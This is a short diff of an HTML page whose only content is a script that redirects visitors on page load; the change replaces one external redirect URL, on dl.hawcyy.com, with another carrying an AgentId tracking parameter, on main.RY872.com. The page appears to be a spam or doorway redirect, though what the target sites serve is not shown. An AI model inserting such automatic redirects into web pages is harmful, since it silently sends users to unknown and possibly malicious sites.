--- a/87.html
+++ b/87.html
@@ -1,4 +1,3 @@
-    
 <script>
-  window.location.href="https://dl.hawcyy.com/?parent=628718&t=1592571255"
+  window.location.href="https://main.RY872.com/?AgentId=202048"
 </script>
